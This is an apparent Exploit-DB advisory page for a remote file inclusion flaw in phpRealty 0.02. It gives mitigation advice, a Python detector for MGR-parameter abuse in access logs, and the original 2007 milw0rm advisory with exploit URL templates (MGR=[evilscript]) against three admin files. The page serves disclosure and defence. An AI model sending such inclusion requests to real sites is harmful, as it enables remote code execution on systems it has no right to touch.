Vendor: phpRealty
By: QTRinux
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: phpRealty
Affected Version From: 0.02
Affected Version To: 0.02
Patch Exists: NO
2007

phpRealty 0.02 (MGR) Remote File include

The phpRealty 0.02 script is vulnerable to remote file inclusion. The vulnerability exists in the 'index.php', 'p_ins.php', and 'u_ins.php' files in the 'manager/admin' directory. An attacker can exploit this vulnerability by including a malicious script via the 'MGR' parameter in the URL. This can lead to remote code execution and potentially compromise the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of phpRealty that addresses this issue. Alternatively, restrict access to the affected files and directories to trusted users only.
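
One way to look for this in web server logs (an added example, not code from the advisory or from the phpRealty project): it flags requests to the three affected files that set MGR in the query string. It assumes common/combined access-log format and that legitimate traffic never passes MGR in the URL; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Files and parameter named in the advisory.
AFFECTED = re.compile(r"/manager/admin/(?:index|p_ins|u_ins)\.php(?:/|$)")
PARAM = "MGR"
# Value points outside the application: scheme/wrapper, protocol-relative or UNC path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)
# Client, request target and status from a common/combined-format line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding that would hide a URL from a single-pass match."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return None, or a finding dict for a request that sets MGR on an affected file."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    if not AFFECTED.search(fully_decode(parts.path)):
        return None
    raw = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    values = [fully_decode(v) for v in raw]
    if not values:
        return None
    severity = "remote-target" if any(REMOTE.match(v) for v in values) else "client-supplied"
    return {"client": client, "path": parts.path, "status": int(status), "severity": severity}

def scan(lines):
    """Findings for every matching line, in log order."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges, .invalid host); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2007:12:00:01 +0000] "GET /realty/manager/admin/index.php?MGR=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Sep/2007:12:00:03 +0000] "GET /realty/manager/admin/p_ins.php?MGR=%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 77',
    '198.51.100.4 - - [10/Sep/2007:12:01:10 +0000] "GET /realty/manager/admin/u_ins.php?MGR=../inc HTTP/1.1" 404 0',
    '198.51.100.9 - - [10/Sep/2007:12:02:00 +0000] "GET /realty/index.php?page=listings HTTP/1.1" 200 9000',
    '198.51.100.9 - - [10/Sep/2007:12:02:05 +0000] "GET /realty/manager/admin/index.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Access logs record only the query string, so a value sent in a request body does not appear in these lines.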

Exploit-DB raw data:

|-------------------------------------------------------------------------------|
| |
| phpRealty 0.02  (MGR) Remote File include |
| |
| Script : phpRealty |
| Version : 0.02 |
| Author : QTRinux |
| Contact : Qataro [at] hotmail [dot] com |
| Vendor : http://phprealty.budissy.com/phprealty/v0.02/ |
| DorK :   :(
|-------------------------------------------------------------------------------|
| Bug in : |
| manager/admin/index.php |
| manager/admin/p_ins.php  |
| manager/admin/u_ins.php  |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[ Path ]/manager/admin/index.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/p_ins.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/u_ins.php?MGR=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : AlQaTaR!,MR.SH4R3S,Mo0oTeC,MaZaGi, |
| |
---------------------[ [Qatar Security Team] ]-------------------------

# milw0rm.com [2007-09-10]